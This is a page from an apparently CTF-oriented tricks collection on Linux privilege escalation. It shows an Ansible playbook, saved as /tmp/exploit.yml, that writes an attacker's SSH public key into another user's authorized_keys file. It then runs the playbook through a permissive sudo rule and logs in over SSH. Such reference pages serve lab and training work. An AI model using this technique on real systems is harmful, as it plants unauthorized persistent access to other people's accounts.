> For the complete documentation index, see [llms.txt](https://sarpers-organization.gitbook.io/ctftricks/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://sarpers-organization.gitbook.io/ctftricks/_chapter-intro-14/linux/capabilities/privilege-escalation-linux-ssh.md).

# Ssh

## Ansible Playbook SSH Key Deployment

```yaml
---
- hosts: localhost
  tasks:
    - name: Add SSH key
      shell: 'mkdir -p /home/wilbur/.ssh && chmod 700 /home/wilbur/.ssh && echo "<ssh_public_key>" > /home/wilbur/.ssh/authorized_keys && chmod 600 /home/wilbur/.ssh/authorized_keys'
```

Create the Ansible playbook, for example at `/tmp/exploit.yml`, with the content above, replacing `<ssh_public_key>` with your public key. Ensure the file is executable if necessary for the specific execution method (e.g., `chmod +x /tmp/exploit.yml` or just `chmod 777 /tmp/exploit.yml` as shown in the notes, if placed in a restrictive directory).

Alternatively, Ansible provides a dedicated module, `authorized_key`, for managing SSH keys. This module is often preferred as it is idempotent and handles file permissions correctly by default. An equivalent task using this module would look like this:

```yaml
- name: Add a new key to the authorized_keys file for user wilbur
  ansible.posix.authorized_key:
    user: wilbur
    state: present
    key: "{{ item }}"
  loop:
    - '<ssh_public_key>' # Replace with your public key string
```

The `authorized_keys` file in SSH specifies the SSH public keys that can be used for logging in to the account for which the file is configured.

Execute this playbook using a method that leverages a prior privilege escalation, such as a `sudo` rule allowing arbitrary script execution. For instance, if a rule permits running `/usr/bin/ansible-playbook /tmp/*`, you could execute the created playbook as the target user. Examples of such permissive sudo rules that could be exploited include:

```bash
sudo ansible-playbook /tmp/exploit.yml
```

or

```bash
sudo /usr/bin/ansible-playbook /tmp/exploit.yml
```

After successful execution, you should be able to log in via SSH using the corresponding private key:

```bash
ssh wilbur@<target_ip> -i <private_key_file>
```
